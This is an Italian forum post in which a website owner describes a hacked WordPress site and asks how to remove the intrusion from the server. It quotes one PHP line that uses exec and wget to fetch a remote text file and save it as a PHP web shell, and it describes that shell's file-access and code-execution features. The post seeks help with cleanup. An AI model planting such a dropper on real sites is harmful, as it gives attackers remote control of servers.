Ho scoperto che sono riusciti a "bucare" un sito costruito in Wordpress. Nello specifico ho visto l'inserimento di una nuova cartella "theme" contenente quattro file, che richiamavano un codice esterno.
Ho esperienza in codice php e in qualche comando base di Linux, per cui ho tratto qualche conclusione (di cui non sono propriamente certo). Vi faccio un riassunto.
Allora, l'index nella nuova cartella ha soltanto questa riga (sostituisco l'indirizzo del sito con uno fittizio, per sicurezza: se mi date via libera segnalo l'indirizzo completo così potete leggere il txt):
Se ho capito bene, prende il file "2.txt" del server esterno, lo copia nel server del sito in Wordpress e lo rinomina. Il fatto è che non esisteva un file "wp-index.php", ma soltanto un file "wp-word.php".Codice PHP:<? exec("wget sito.com/2.txt;mv 2.txt wp-index.php"); ?>
Ho aperto il "wp-word.php" e in effetti era identico al "2.txt" online nel contenuto. L'antivirus sul mio pc lo rileva, infatti, come virus o malware e me lo blocca.
Ho visto nel codice diversi riferimenti a siti esterni. In particolare vi dice qualcosa il nome "Rafaeltongol"? Se cerco sul web ho trovato alcuni riferimenti poco piacevoli...
Inoltre fa un riferimento al sito milw0rm.com, che da quanto mi risulta è chiuso.
Da quanto ho visto, una volta elaborato, con questo script crea un'intefaccia grafica che permette l'accesso a qualsiasi cosa: vede i file, può creare cartelle e file e addirittura eseguire codice.
Posso toglierlo dal sito, ma la mia paura è che sia "infiltrato" anche in altri siti del server a cui si appoggia quello in Wordpress. Sapete cosa si deve fare per toglierlo del tutto? Chiedo ai gestori del server di fare uno scan completo in cerca dei file malevoli?
